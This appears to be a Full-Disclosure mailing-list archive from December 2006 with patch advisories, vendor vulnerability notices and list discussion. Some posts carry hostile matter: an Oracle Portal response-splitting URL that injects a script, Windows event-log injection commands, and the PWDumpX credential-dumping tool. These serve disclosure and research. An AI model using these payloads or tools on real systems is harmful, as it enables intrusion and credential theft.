    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.17.1-1ubuntu7.1_powerpc.deb
      Size/MD5:     1260 482c88080f1375e327e631b61adc6552

  sparc architecture (Sun SPARC/UltraSPARC)

    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono-dev_1.1.17.1-1ubuntu7.1_sparc.deb
      Size/MD5:  1124674 01d7a962a0035faea6746e979d01776c
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/libmono0_1.1.17.1-1ubuntu7.1_sparc.deb
      Size/MD5:   839334 b3be3cdabecdfaa375090127c04ef2d5
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-common_1.1.17.1-1ubuntu7.1_sparc.deb
      Size/MD5:    93488 3bbf0e0433549db3a40d3a98081d9af8
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-devel_1.1.17.1-1ubuntu7.1_sparc.deb
      Size/MD5:    15892 746e0b301c4017d9c38d54515eeb13d1
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jay_1.1.17.1-1ubuntu7.1_sparc.deb
      Size/MD5:    56182 08a1b26440c074071129120adde393b7
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-jit_1.1.17.1-1ubuntu7.1_sparc.deb
      Size/MD5:   704896 17189bf83898893b4da699653b1ed2a9
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-runtime_1.1.17.1-1ubuntu7.1_sparc.deb
      Size/MD5:    15862 d18ac3cc83e94fe549c32d57bc512f65
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono-utils_1.1.17.1-1ubuntu7.1_sparc.deb
      Size/MD5:  1110106 1de8dc45fdcd083a298e876a39e4c676
    http://security.ubuntu.com/ubuntu/pool/main/m/mono/mono_1.1.17.1-1ubuntu7.1_sparc.deb
      Size/MD5:     1260 91765ebd3ef94a7ba557aef413a86951

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061220/f118d722/attachment.bin 

From security at mandriva.com  Wed Dec 20 23:38:51 2006
From: security at mandriva.com (security at mandriva.com)
Date: Wed, 20 Dec 2006 16:38:51 -0700
Subject: [Full-disclosure] [ MDKSA-2006:234 ] - Updated mono packages fix
	vulnerability
Message-ID: 


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDKSA-2006:234
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : mono
 Date    : December 20, 2006
 Affected: 2007.0
 _______________________________________________________________________
 
 Problem Description:
 
 XSP (the Mono ASP.NET server) is vulnerable to source disclosure attack
 which allow a malicious user to obtain the source code of the
 server-side application. This vulnerability grants the attacker deeper
 knowledge of the Web application logic.

 Updated packages have been patched to correct this issue.
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6104
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 372cd7944c4ae044529132a60a0f4cba  2007.0/i586/jay-1.1.17.1-5.2mdv2007.0.i586.rpm
 57586c9c8baff2fbe3c59c3529adc5a7  2007.0/i586/libmono-runtime-1.1.17.1-5.2mdv2007.0.i586.rpm
 1cf0dcab116f59634f3890fab1cb46eb  2007.0/i586/libmono0-1.1.17.1-5.2mdv2007.0.i586.rpm
 1898e4fc4e6f1c671c37a8d76814a89f  2007.0/i586/libmono0-devel-1.1.17.1-5.2mdv2007.0.i586.rpm
 7dca6df31b2cac25df9d1568136ab8b3  2007.0/i586/mono-1.1.17.1-5.2mdv2007.0.i586.rpm
 cb7c8cd1f5db165f31ea7e139d60fc75  2007.0/i586/mono-data-sqlite-1.1.17.1-5.2mdv2007.0.i586.rpm
 73cfb46d15b9b0588f4013781d40a114  2007.0/i586/mono-doc-1.1.17.1-5.2mdv2007.0.i586.rpm 
 ddc633435f442f9436caec01d9796830  2007.0/SRPMS/mono-1.1.17.1-5.2mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 2b54bfd1164dd9c935b9af5c3297e90a  2007.0/x86_64/jay-1.1.17.1-5.2mdv2007.0.x86_64.rpm
 6b137c021b3596699b22af6a8ef919fc  2007.0/x86_64/lib64mono0-1.1.17.1-5.2mdv2007.0.x86_64.rpm
 8825990b27f3c66c2e225d483290b41d  2007.0/x86_64/lib64mono0-devel-1.1.17.1-5.2mdv2007.0.x86_64.rpm
 a58792e500afc0a1f231a46ba7c8cf96  2007.0/x86_64/libmono-runtime-1.1.17.1-5.2mdv2007.0.x86_64.rpm
 6030ac6e852551dea3f36dc2ab54ecb2  2007.0/x86_64/mono-1.1.17.1-5.2mdv2007.0.x86_64.rpm
 baec0fa42850f91bb089317f62e5722c  2007.0/x86_64/mono-data-sqlite-1.1.17.1-5.2mdv2007.0.x86_64.rpm
 72d633232728911fc9fa428ab3af582f  2007.0/x86_64/mono-doc-1.1.17.1-5.2mdv2007.0.x86_64.rpm 
 ddc633435f442f9436caec01d9796830  2007.0/SRPMS/mono-1.1.17.1-5.2mdv2007.0.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFFiX+7mqjQ0CJFipgRAoaWAKCaYYK+vmPWKIsmFyVX3VXw9fEw+gCePcyJ
X3utvyAnG5Kd3sKqxKy2y7Q=
=3vlL
-----END PGP SIGNATURE-----



From eaton.lists at gmail.com  Wed Dec 20 18:55:09 2006
From: eaton.lists at gmail.com (Brian Eaton)
Date: Wed, 20 Dec 2006 13:55:09 -0500
Subject: [Full-disclosure] Oracle Portal 10g HTTP Response Splitting
In-Reply-To: 
References: 
Message-ID: <242a0a8f0612201055y7509a182ra63a070ae7583694@mail.gmail.com>

On 12/20/06, putosoft softputo  wrote:
> Oracle Portal/Applications HTTP Response Splitting
> --------------------------------------------------
>
> Sample:
>
> http:///webapp/jsp/calendar.jsp?enc=iso-8859-1%0d%0aContent-length=12%0d%0a%0d%0a%3Cscript%3Ealert('hi')%3C/script%3E

So they let the URL specify the content-encoding?  They might be
vulnerable to XSS via UTF-7 as well.

Regards,
Brian



From James.Williams at ca.com  Thu Dec 21 03:58:38 2006
From: James.Williams at ca.com (Williams, James K)
Date: Wed, 20 Dec 2006 22:58:38 -0500
Subject: [Full-disclosure] [CAID 34876]: CA CleverPath Portal Session
	Inheritance Vulnerability
Message-ID: <649CDCB56C88AA458EFF2CBF494B620401E7B011@USILMS12.ca.com>


Title: CAID 34876: CA CleverPath Portal Session Inheritance
Vulnerability

CA Vulnerability ID (CAID): 34876

CA Advisory Date: 2006-12-19

Discovered By: CA customer and CA Technical Support

Impact: Remote attackers can potentially gain access to a user's 
Portal session.

Summary: CA CleverPath Portal and other CA solutions that embed 
Portal technology contain a session verification vulnerability.  
In certain multiple Portal server configurations, a user who 
connects through one Portal server could conceivably inherit the 
Portal session and associated security authentication of a user 
running on another Portal server.

Mitigating Factors: This problem only occurs when multiple Portal 
servers are sharing a common data store, and two of the Portal 
servers are started at exactly the same time. Typically, customers 
deploy multiple Portal servers in this type of configuration to 
utilize high-availability failover and load balancing. A multi 
CleverPath Portal server environment is not a default deployment, 
but it is an optional post installation configuration. None of the 
CA solutions that embed the Portal technology install into this 
scenario, or offer a multiple Portal server environment as a 
configurable option. However, it is conceivable that a 
knowledgeable administrator could have modified an embedded Portal 
environment to leverage multiple Portal servers.

Severity: CA has given this vulnerability a Low risk rating.

Affected Products:
CleverPath Portal r4.51
CleverPath Portal r4.7
CleverPath Portal r4.71
BrightStor Portal r11.1
CleverPath Aion BPM r10
CleverPath Aion BPM r10.1
CleverPath Aion BPM r10.2
eTrust Security Command Center r1
eTrust Security Command Center r8
Unicenter Asset and Portfolio Management r11
Unicenter Database Management Portal r11
Unicenter Database Command Center r11.1
Unicenter Enterprise Job Manager r1 SP3
Unicenter Workload Control Center r1 SP4
Unicenter Management Portal r2.0
Unicenter Management Portal r3.1
Unicenter Management Portal r11.0

Affected platforms:
All supported operating systems (Windows, Linux, and supported 
UNIX platforms).

Status and Recommendation: 
The most prudent course of action for affected customers is to 
download and apply the corrective maintenance. If the maintenance 
cannot be applied right away, CA Technical Support recommends 
implementing interim operational process controls to ensure, when 
multiple Portal servers are sharing a common data store, that the 
server start times are duly staggered by at least one minute.

Determining if you are affected: 
Affected Portal installations must meet both of the following 
criteria:
1) You are not at Portal maintenance version 4.71.001_179_060830 
   or higher. To determine your portal version:
   a. Login as a Portal Administrator.
   b. Choose "My Profile" from the upper right-hand portion of the 
      main workplace.
   c. Click on the "Portal Administration" link.
   d. The Portal version will be displayed in the right-hand pane 
      under Statistics.
2) You are running CA's Portal technology in a multi-server 
   environment. To determine if you are running a multi-server 
   environment:
   a. Login as a Portal Administrator.
   b. Choose "My Profile" from the upper right-hand portion of the 
      main workplace.
   c. Click on the "Portal Administration" link.
   d. If the "Jump to Portal" menu appears in the left Portal 
      Administration pane, you are using a multiple-server 
      environment. If you do not see the "Jump to Portal" section, 
      then Portal is not running in a multi-server environment and 
      is not affected by this vulnerability.
Note: refer to the SupportConnect Security Notice for additional 
information.

References (URLs may wrap): 
CA SupportConnect:
http://supportconnect.ca.com/
CA SupportConnect security notice for this vulnerability:
Important Security Notice for CA CleverPath and Embedded Portal
Customers
http://supportconnectw.ca.com/public/ca_common_docs/cpportal_secnot.asp
Solution Document Reference APARs: 
Refer to the SupportConnect Security Notice.
CA Security Advisor posting:
CA CleverPath Portal Session Inheritance Vulnerability
http://www3.ca.com/securityadvisor/newsinfo/
CAID: 34876
CAID Advisory link: 
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34876
CVE Reference: CVE-2006-6641
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6641
OSVDB Reference: OSVDB-30854
http://osvdb.org/30854

Changelog for this advisory:
v1.0 - Initial Release

Customers who require additional information should contact CA 
Technical Support at http://supportconnect.ca.com.

For technical questions or comments related to this advisory,
please send email to vuln at ca.com, or contact me directly.

If you discover a vulnerability in CA products, please report
your findings to vuln at ca.com, or utilize our "Submit a 
Vulnerability" form.
URL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx


Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research

CA, One CA Plaza. Islandia, NY 11749
	
Contact http://www3.ca.com/contact/
Legal Notice http://www3.ca.com/legal/
Privacy Policy http://www3.ca.com/privacy/
Copyright ? 2006 CA. All rights reserved.

From skx at debian.org  Thu Dec 21 10:12:20 2006
From: skx at debian.org (Steve Kemp)
Date: Thu, 21 Dec 2006 10:12:20 +0000
Subject: [Full-disclosure] [SECURITY] [DSA-1240-1] New links2 packages fix
	arbitrary shell command execution
Message-ID: <20061221101220.GA25714@steve.org.uk>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


- ------------------------------------------------------------------------
Debian Security Advisory DSA-1240-1                  security at debian.org
http://www.debian.org/security/                               Steve Kemp
December 21, 2006
- ------------------------------------------------------------------------

Package        : links2
Vulnerability  : insufficient escaping
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2006-5925
Debian Bug     : 400718

Teemu Salmela discovered that the links2 character mode web browser
performs insufficient sanitising of smb:// URIs, which might lead to the
execution of arbitrary shell commands.

For the stable distribution (sarge) this problem has been fixed in
version 2.1pre16-1sarge1.

For the upcoming stable distribution (etch) this problem has been
fixed in version 2.1pre26-1.

For the unstable distribution (sid) this problem has been fixed in
version 2.1pre26-1.

We recommend that you upgrade your links2 package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian 3.1 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1.diff.gz
    Size/MD5 checksum:    28658 a83c79990bbfb6f9ec26d737f767ee90
  http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16.orig.tar.gz
    Size/MD5 checksum:  4217483 7baf4fc20cc244d80ead21cebff07d89
  http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1.dsc
    Size/MD5 checksum:      841 ed4853334b7eebef055271df06cdcd7a

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1_alpha.deb
    Size/MD5 checksum:  2110324 b3633fddb199c45339d3837bb0a519a0

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1_amd64.deb
    Size/MD5 checksum:  2040922 5fb402e6a833709741d20238346c7597

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1_arm.deb
    Size/MD5 checksum:  1996004 c7c79ddcb82d5758668ed71d74b9685f

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1_i386.deb
    Size/MD5 checksum:  1997426 4c1ef611e31c57583f7471653962a84a

m68k architecture (Motorola Mc680x0)

  http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1_m68k.deb
    Size/MD5 checksum:  1904084 e5c777a07eaa88f4367b51d88c556a14

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1_mips.deb
    Size/MD5 checksum:  2034596 22854de6eaf3aa1e392291760e85e5e8


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFFil26wM/Gs81MDZ0RAvPPAJ9cxthVIvv2w2UmXuzhiiPR21aOjgCgo7J8
vA5Gql5VNhz4zm/QV5K4pig=
=JT/Q
-----END PGP SIGNATURE-----



From reedarvin at gmail.com  Wed Dec 20 18:24:55 2006
From: reedarvin at gmail.com (Reed Arvin)
Date: Wed, 20 Dec 2006 11:24:55 -0700
Subject: [Full-disclosure] New Windows tool - PWDumpX v1.1 (with CacheDump
	functionality)
Message-ID: <80115b690612201024g763f4a45n729cbf3867d3b501@mail.gmail.com>

New Windows tool - PWDumpX v1.1 (with CacheDump functionality)

Tool location: http://reedarvin.thearvins.com/tools/PWDumpX11.zip

=====

Description:

PWDumpX version 1.1 allows a user with administrative privileges to
retrieve the domain password cache, password hashes and LSA secrets
from a Windows system. This tool can be used on the local system or on
one or more remote systems.

If an input list of remote systems is supplied, PWDumpX will attempt
to obtain the domain password cache, the password hashes and the LSA
secrets from each remote Windows system in a multi-threaded fashion
(up to 64 systems simultaneously).

The domain password cache, password hashes and LSA secrets from remote
Windows systems are encrypted as they are transfered over the network.
No data is sent over the network in clear text.

This tool is a completely re-written version of CacheDump, PWDump3e
and LSADump2 which integrates suggestions/bug fixes for PWDump3e and
LSADump2 found on various web sites, etc.

Source code included.

Credits:

My intent with including the source code along with this tool is to
give something back to the I.T. security community. I learned a lot
while creating PWDumpX but I could not have done it without the
original source code for CacheDump, PWDump2, PWDump3e, and LSADump2.
So...thanks to the creators of these tools for being generous enough
to include the source code with these tools so that hungry minds can
learn new things.

=====

Tool homepage: http://reedarvin.thearvins.com/tools.html

Written by Reed Arvin .

Thank you,

Reed Arvin 



From Jason at TechDude.Ca  Thu Dec 21 05:38:25 2006
From: Jason at TechDude.Ca (Jason Muskat, GCFA, GCUX, de VE3TSJ)
Date: Thu, 21 Dec 2006 00:38:25 -0500
Subject: [Full-disclosure] [WEB SECURITY] comparing information security
 to other industries
In-Reply-To: 
Message-ID: 

Hello,

People, programmers, computers, software, design patterns, systems, and
infrastructure are constantly changing, often being reinvented. As such,
will never be stable.

Concrete of a type is always the same and therefore predictable. One can
state with certainly that a concrete slab will perform to design. This will
ever be possible in IT.

Many commercially produced software products don?t have any warranty. Many
even state that the software is not warranted for any function or purpose.
... The fact that the software does something that one thinks it should do
is incidental. 


Regards,

-- 
Jason Muskat  | GCFA, GCUX - de VE3TSJ
____________________________
TechDude
e. Jason at TechDude.Ca
m. 416 .414 .9934

http://TechDude.Ca/



From: KT 
Date: Tue, 19 Dec 2006 12:16:29 -0800
To: , 
Subject: [WEB SECURITY] comparing information security to other industries

So we have been dealing with information security from last 20 years and
still the world is at large lost. We still see banks vulnerable to trivial
XSS attacks and software broken by buffer overflows. How do we compare to
other industries like construction, engineering, finance? What I am trying
to figure out is how mature we are and how long will it take for to get
stable?


-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061221/e1941be5/attachment.html 

From aaronngray at gmail.com  Thu Dec 21 02:28:08 2006
From: aaronngray at gmail.com (Aaron Gray)
Date: Thu, 21 Dec 2006 02:28:08 +0000
Subject: [Full-disclosure] Windows is very holy
Message-ID: 

Windows is very very holy.

Microsoft may draw castles guarded by lions round PC's in adverts but we
know better.

Aaron
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061221/56ab8775/attachment.html 

From security at nruns.com  Thu Dec 21 11:50:17 2006
From: security at nruns.com (security at nruns.com)
Date: Thu, 21 Dec 2006 12:50:17 +0100
Subject: [Full-disclosure] NOD32 Antivirus CAB parsing Arbitrary Code
	Execution Advisory
Message-ID: 

n.runs AG					   
http://www.nruns.com/			               security at nruns.com
n.runs-SA-2006.005                                           21-Dec-2006
________________________________________________________________________

Vendor:	            ESET, http://eset.com
Affected Products:	ESET NOD32 Antivirus
Vulnerability:          Arbitrary Code Execution (remote) 
Risk:			      HIGH

________________________________________________________________________

Vendor communication:

  2006/08/24		initial notification of ESET 
  2006/08/28		ESET Response
  2006/08/29		PGP keys exchange
  2006/08/29		PoC files sent to ESET
  2006/09/06		ESET initial feedback.
  2006/09/08		ESET confirmed the bug and fixed
  2006/09/08		ESET made available the updates
________________________________________________________________________

Overview:
 
Founded in 1992, ESET is a global provider of security software for
enterprises and consumers. ESET's award-winning, antivirus software system,
NOD32, provides real-time protection from known and unknown viruses,
spyware, rootkits and other malware. NOD32 offers the smallest, fastest and
most advanced protection available, with more Virus Bulletin 100% Awards
than any other antivirus product. ESET was named to Deloitte's Technology
Fast 500 five years running, and has an extensive partner network, including
corporations like Canon, Dell and Microsoft. ESET has offices in Bratislava,
SK; Bristol, U.K.; Buenos Aires, AR; Prague, CZ; San Diego, USA; and is
represented worldwide in more than 100 countries. 
The broad product platform protects Windows, Linux, Novell and MS DOS
machines.

Description:
A remotely exploitable vulnerability has been found in the file parsing
engine.

In detail, the following flaw was determined:

- Heap Overflow through Integer Overflow in .CAB file parsing

This problem can lead to remote arbitrary code execution if an attacker
carefully crafts a file that exploits the aforementioned vulnerability. The
vulnerability is present in NOD32 Antivirus software versions prior to the
update v.1.1743.

Solution:
The vulnerability was reported on Aug 24 and an update has been issued on
Sep 08 to solve this vulnerability through the regular update mechanism.

________________________________________________________________________

Credit: 
Bugs found by Sergio Alvarez of n.runs AG. 
________________________________________________________________________

The information provided is released by n.runs "as is" without warranty of
any kind. n.runs except all warranties, either express or implied, expect
for the warranties of merchantability. In no event shall n.runs be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if n.runs
has been advised of the possibility of such damages.
Distribution or Reproduction of the information is provided that the
advisory is not modified in any way.

Copyright 2006 n.runs. All rights reserved. Terms of use.



From Report_exploit at CyTRAP.eu  Thu Dec 21 11:27:59 2006
From: Report_exploit at CyTRAP.eu (CyTRAP Labs - advisory)
Date: Thu, 21 Dec 2006 12:27:59 +0100
Subject: [Full-disclosure] Tele2 - Versatel and Vivendi - exploit PATCHED
In-Reply-To: 
References: 
Message-ID: <6.2.1.2.0.20061221120215.03636780@pop.gmail.com>

This vulnerability has been patched successfully by the vendor as tests by 
various parties have demonstrated, more details here:

http://cytrap.eu/blog/?p=133

Happy Holidays
Urs E. Gattiker
CyTRAP Labs and www.CASEScontact.org


At 21:23 2006-10-04, you wrote:
>------------------------------
>
>Message: 2
>Date: Wed, 04 Oct 2006 13:56:27 +0200
>Subject: [Full-disclosure] Tele2 - Versatel and Vivendi - exploit
>To: full-disclosure at lists.grok.org.uk
>Message-ID: <7.0.1.0.0.20061004095637.05222f10 at WebUrb.dk>
>Content-Type: text/plain; charset="us-ascii"; format=flowed
>
>Tele 2 has recently announced that it is selling its Benelux assets
>to Versatel and yesterday it informed the media that it intends to do
>the same with its French assets, selling those to Vivendi.
>
>The company that touts itself as providing economical broadband and
>telecommunication services does, however, have a slight problem
>regarding information security.
>
>A vulenrability is being taken advantage off by various groups of
>people and, in turn, this could harm home users that receive their
>broadband and fixed-line services from Tele2.
>
>In fact, several security features can be de-activated allowing a
>malicious user to take control of a user's PC, his broadband
>connection as well as his phone line as described here with a screen shot:
>
>http://cytrap.eu/blog/?p=57
>
>This is another example where user's face risks regarding their
>internet connection they might not even be aware of. Another one of
>those is the recent Fon example also circulated on this list.
>
>Urs E. Gattiker
>CyTRAP Labs & CASEScontact.org



From 3APA3A at SECURITY.NNOV.RU  Thu Dec 21 11:58:17 2006
From: 3APA3A at SECURITY.NNOV.RU (3APA3A)
Date: Thu, 21 Dec 2006 14:58:17 +0300
Subject: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption
	0day
Message-ID: <1627317058.20061221145817@SECURITY.NNOV.RU>

Dear full-disclosure at lists.grok.org.uk,

  Since  it's  already  wide  spread on the public forums and exploit is
  published  on  multiple  sites and there is no way to stop it, I think
  it's time to alert lists about this.

  On the one of Russian forums:
  http://www.kuban.ru/forum_new/forum2/files/19124.html
  message  was  published  by  NULL  about  vulnerability  in Windows on
  processing   MessageBox()   with   MB_SERVICE_NOTIFICATION   flag  and
  message/caption  beggining with \??\. Vulnerability seems to be memory
  corruption  in  kernel  and  causes  system  crash  or  hang after few
  attempts.  It  seems  to happen because message is logged to event log
  and may point to some problem with event logs processing.

  Vulnerability details and code may be found here:
  http://www.security.nnov.ru/Gnews944.html

  There  is  potential  remote  exploitation vector if some service uses
  user-supplied  input  for  MessageBox() function. Messenger service is
  not  vulnerable  in  this way, because it prepends user-supplied input
  with additional string.

  I contacted Microsoft on this issue on December, 16.

-- 
http://www.security.nnov.ru
         /\_/\
        { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
                    |/



From fd at gomor.org  Thu Dec 21 12:16:22 2006
From: fd at gomor.org (GomoR)
Date: Thu, 21 Dec 2006 13:16:22 +0100
Subject: [Full-disclosure] SinFP 2.06,
	now works under big-endian architectures
In-Reply-To: 
References: 
Message-ID: <20061221121622.GA3495@oshima.enslaved.lan>

Hello,

SinFP is a new approach to OS fingerprinting, which bypasses 
limitations that nmap has. More info:
http://www.gomor.org/sinfp .

SinFP has now 140 signatures.

You can download it via CPAN, or via SourceForge:
https://sourceforge.net/projects/sinfp

Also, two benchmarks versus Nmap have been done:
http://www.phocean.net/index.php/post/2006/12/17/SinFP
http://www.computerdefense.org/?p=173

This new release has been tested under Solaris 8/SPARC, 
and Mac OS X/PPC.

Example "advanced" usage:
# sinfp.pl -kai www.heise.de
P1: B00000 F0 W0 O0 M0
P2: B11113 F0x12 W4320 O0204ffff010303000101080affffffff4445414401010402 M1440
P3: B11123 F0x14 W0 O0 M0
IPv4: unknown
##
## Retry in offline active mode:
##
# sinfp.pl -1 -f sinfp4-193.99.144.85.80.pcap -H
P2: B11113 F0x12 W4320 O0204ffff010303000101080affffffff4445414401010402 M1440
IPv4: BH0FH0WH2OH0MH1/P2: Unix: IRIX: 6.5

-- 
  ^  ___  ___             http://www.GomoR.org/          <-+
  | / __ |__/          Systems & Security Engineer         |
  | \__/ |  \     ---[ zsh$ alias psed='perl -pe ' ]---    |
  +-->  Net::Frame <=> http://search.cpan.org/~gomor/  <---+



From 3APA3A at SECURITY.NNOV.RU  Thu Dec 21 12:22:09 2006
From: 3APA3A at SECURITY.NNOV.RU (3APA3A)
Date: Thu, 21 Dec 2006 15:22:09 +0300
Subject: [Full-disclosure] Fun with event logs (semi-offtopic)
Message-ID: <169373868.20061221152209@SECURITY.NNOV.RU>

Dear full-disclosure at lists.grok.org.uk,

There  is  interesting  thing  with  event  logging on Windows. The only
security  aspect  of  it  is  event log record tampering and performance
degradation,  but  it may become sensitive is some 3rd party software is
used for automated event log analysis.

The   problem   is   a  kind  of  "Format  string"  vulnerability  where
user-supplied  input  is  used  for  event log record. For ReportEvent()
function  %1,  %2,  etc  have  a  special  meaning and are replaced with
corresponding  string  from  lpStrings.  The problem is this can be done
recursively.  That is, %2 argument can include itself. This fact doesn't
lead  to  any  buffer  overflow,  but  you  can  fill entire buffer with
relatively small argument.

Most  services  do  not escape any user-supplied input then constructing
log  event.  You  can  see very interesting event log entries if you try
something like:

net send SOMEHOST %2

or

net use \\SOMEHOST\IPC$ /user:%1%2%3


-- 
http://www.security.nnov.ru
         /\_/\
        { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
                    |/



From xploitable at gmail.com  Wed Dec 20 21:38:38 2006
From: xploitable at gmail.com (n3td3v)
Date: Wed, 20 Dec 2006 21:38:38 +0000
Subject: [Full-disclosure] n3td3v calls on month of bug campaigns to stop
Message-ID: <4b6ee9310612201338r298f4f5aw1e25715358c093f0@mail.gmail.com>

[introduction]
n3td3v is deeply sad at the new trend of morally accepted blackmail by
the security community, known better as a month of bugs.

sincere researchers are coming forward more frequently to threaten
companies with a month of vendor bugs.

because they are known to be sincere they are morally left off the
hook from what is known by n3td3v to be straight forward blackmail.

blackmail is illegal, for this reason n3td3v wishes to make the
following recommendations:

[1]bug a day for a month campaigns are blackmail on the part of the
researcher, all should be outlawed by government.

[2]n3td3v calls on the government to make it highly illegal and
morally unacceptable to threaten a month of bugs for a vendor and its
customers

[3]security researchers think its "fun" but all it amounts to is blackmail

[4]all blackmail attempts shouldn't be dressed up as harmless fun

[5]governments need to wake up and swiftly arrest those making month
of bug claims in the future

[6]corporations and its consumers shouldn't be scared mongered and
threatened by individuals

[7]researchers shouldn't use their real name or real place of
employment and expect exclusion from legal action against blackmail

[8]researchers shouldn't be allowed to profit or gain career
opportunities by such claims to action by the researcher

[9]researchers should be taken into custody, questioned and have their
hardware obtained for forensic analysis before a month of bugs is due
to start

[10]individuals threatening to carry out a month of bugs shouldn't be
labelled as "security researchers" by the media and security experts

[11]such individuals should be clearly labelled as "criminals",
"malicious attackers" and "blackhats", no matter what other "friendly"
or "useful" research they've carried out in the past.

[media dork reference]
http://news.com.com/2061-10793_3-6144833.html



From timo.schoeler at riscworks.net  Thu Dec 21 13:02:42 2006
From: timo.schoeler at riscworks.net (Timo Schoeler)
Date: Thu, 21 Dec 2006 14:02:42 +0100
Subject: [Full-disclosure] n3td3v calls on month of bug campaigns to stop
In-Reply-To: <4b6ee9310612201338r298f4f5aw1e25715358c093f0@mail.gmail.com>
References: <4b6ee9310612201338r298f4f5aw1e25715358c093f0@mail.gmail.com>
Message-ID: <458A85F2.8090506@riscworks.net>

n3td3v wrote:
> [introduction]
> n3td3v is deeply sad at the new trend of morally accepted blackmail by
> the security community, known better as a month of bugs.
> 
> sincere researchers are coming forward more frequently to threaten
> companies with a month of vendor bugs.
> 
> because they are known to be sincere they are morally left off the
> hook from what is known by n3td3v to be straight forward blackmail.
> 
> blackmail is illegal, for this reason n3td3v wishes to make the
> following recommendations:
> 
> [1]bug a day for a month campaigns are blackmail on the part of the
> researcher, all should be outlawed by government.
> 
> [2]n3td3v calls on the government to make it highly illegal and
> morally unacceptable to threaten a month of bugs for a vendor and its
> customers
> 
> [3]security researchers think its "fun" but all it amounts to is blackmail
> 
> [4]all blackmail attempts shouldn't be dressed up as harmless fun
> 
> [5]governments need to wake up and swiftly arrest those making month
> of bug claims in the future
> 
> [6]corporations and its consumers shouldn't be scared mongered and
> threatened by individuals
> 
> [7]researchers shouldn't use their real name or real place of
> employment and expect exclusion from legal action against blackmail
> 
> [8]researchers shouldn't be allowed to profit or gain career
> opportunities by such claims to action by the researcher
> 
> [9]researchers should be taken into custody, questioned and have their
> hardware obtained for forensic analysis before a month of bugs is due
> to start
> 
> [10]individuals threatening to carry out a month of bugs shouldn't be
> labelled as "security researchers" by the media and security experts
> 
> [11]such individuals should be clearly labelled as "criminals",
> "malicious attackers" and "blackhats", no matter what other "friendly"
> or "useful" research they've carried out in the past.
> 
> [media dork reference]
> http://news.com.com/2061-10793_3-6144833.html

there's one extremely simple solution: write good code!

furthermore, vendors who sell crap deserve to be blamed to do so. 
Mercedes-Benz' sales of their E-Class went down enourmously when the 
fact was known that it was extremely poorly engineered, especially wrt 
electrics.

